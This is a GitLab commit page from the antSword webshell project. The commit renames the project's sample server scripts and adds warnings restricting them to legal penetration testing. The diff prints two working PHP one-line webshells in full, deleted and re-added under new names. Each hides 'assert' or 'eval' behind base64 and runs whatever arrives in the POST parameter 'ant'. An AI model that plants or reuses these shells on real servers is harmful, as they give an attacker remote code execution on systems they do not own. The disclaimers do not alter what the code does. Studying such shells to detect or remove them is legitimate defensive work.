Skip to content
Projects
Groups
Snippets
Help
Loading...
Help
Submit feedback
Contribute to GitLab
Sign in / Register
Toggle navigation
A
antSword
Project
Project
Details
Activity
Releases
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
HuangJunbo
antSword
Commits
c03f6d26
Commit
c03f6d26
authored
Apr 29, 2016
by
Medicean
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
Stat(Scripts): Update statement for all scripts
更新声明
parent
d5c47b10
Changes
7
Hide whitespace changes
Inline
Side-by-side
Showing
7 changed files
with
52 additions
and
11 deletions
+52
-11
README.md
shells/README.md
+5
-5
jsp_custom_script_for_mysql.jsp
shells/jsp_custom_script_for_mysql.jsp
+4
-2
php_assert.php
shells/php_assert.php
+0
-1
php_assert_script.php
shells/php_assert_script.php
+19
-0
php_create_function.php
shells/php_create_function.php
+0
-1
php_create_function_script.php
shells/php_create_function_script.php
+19
-0
php_custom_script_for_mysql.php
shells/php_custom_script_for_mysql.php
+5
-2
No files found.
shells/README.md
View file @
c03f6d26
## Shell-Scripts
> 此目录用于存放一些示例的服务端脚本文件,仅供
参考。
> 此目录用于存放一些示例的服务端脚本文件,仅供
合法的渗透测试以及爱好者参考学习,请勿用于非法用途,否则将追究其相关责任!
### PHP
1.
[
PHP Custom S
py for Mysql
](
./php_custom_spy
_for_mysql.php
)
2.
[
PHP Create_Function
](
./php_create_function
.php
)
3.
[
PHP Assert
](
./php_asser
t.php
)
1.
[
PHP Custom S
cript for Mysql
](
./php_custom_script
_for_mysql.php
)
2.
[
PHP Create_Function
Script
](
./php_create_function_script
.php
)
3.
[
PHP Assert
Script
](
./php_assert_scrip
t.php
)
### JSP
1.
[
JSP Custom S
py for Mysql
](
./jsp_custom_spy
_for_mysql.jsp
)
1.
[
JSP Custom S
cript for Mysql
](
./jsp_custom_script
_for_mysql.jsp
)
shells/jsp_custom_s
py
_for_mysql.jsp
→
shells/jsp_custom_s
cript
_for_mysql.jsp
View file @
c03f6d26
...
...
@@ -5,8 +5,10 @@
| (_| | | | | |_ ___) \ V V / (_) | | | (_| |
\__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
———————————————————————————————————————————————
AntSword JSP Custom Spy for Mysql
Author:Medici.Yan
AntSword JSP Custom Script for Mysql
警告:
此脚本仅供合法的渗透测试以及爱好者参考学习
请勿用于非法用途,否则将追究其相关责任!
———————————————————————————————————————————————
说明:
...
...
shells/php_assert.php
deleted
100644 → 0
View file @
d5c47b10
<?php
$ant
=
base64_decode
(
"YXNzZXJ0"
);
$ant
(
$_POST
[
'ant'
]);
?>
\ No newline at end of file
shells/php_assert_script.php
0 → 100644
View file @
c03f6d26
<?php
/**
* _ ____ _
* __ _ _ __ | |_/ ___|_ _____ _ __ __| |
* / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
* | (_| | | | | |_ ___) \ V V / (_) | | | (_| |
* \__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
* ———————————————————————————————————————————————
* AntSword PHP assert Script
*
* 警告:
* 此脚本仅供合法的渗透测试以及爱好者参考学习
* 请勿用于非法用途,否则将追究其相关责任!
* ———————————————————————————————————————————————
* pwd=ant
*/
$ant
=
base64_decode
(
"YXNzZXJ0"
);
$ant
(
$_POST
[
'ant'
]);
?>
\ No newline at end of file
shells/php_create_function.php
deleted
100644 → 0
View file @
d5c47b10
<?php
$ant
=
create_function
(
""
,
base64_decode
(
'QGV2YWwoJF9QT1NUWyJhbnQiXSk7'
));
$ant
();
?>
\ No newline at end of file
shells/php_create_function_script.php
0 → 100644
View file @
c03f6d26
<?php
/**
* _ ____ _
* __ _ _ __ | |_/ ___|_ _____ _ __ __| |
* / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
* | (_| | | | | |_ ___) \ V V / (_) | | | (_| |
* \__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
* ———————————————————————————————————————————————
* AntSword PHP Create_Function Script
*
* 警告:
* 此脚本仅供合法的渗透测试以及爱好者参考学习
* 请勿用于非法用途,否则将追究其相关责任!
* ———————————————————————————————————————————————
* pwd = ant
*/
$ant
=
create_function
(
""
,
base64_decode
(
'QGV2YWwoJF9QT1NUWyJhbnQiXSk7'
));
$ant
();
?>
\ No newline at end of file
shells/php_custom_s
py
_for_mysql.php
→
shells/php_custom_s
cript
_for_mysql.php
View file @
c03f6d26
...
...
@@ -6,8 +6,11 @@
* | (_| | | | | |_ ___) \ V V / (_) | | | (_| |
* \__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
* ———————————————————————————————————————————————
* AntSword PHP Custom Spy for Mysql
* Author:Medici.Yan
* AntSword PHP Custom Script for Mysql
*
* 警告:
* 此脚本仅供合法的渗透测试以及爱好者参考学习
* 请勿用于非法用途,否则将追究其相关责任!
* ———————————————————————————————————————————————
*
* 使用说明:
...
...
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment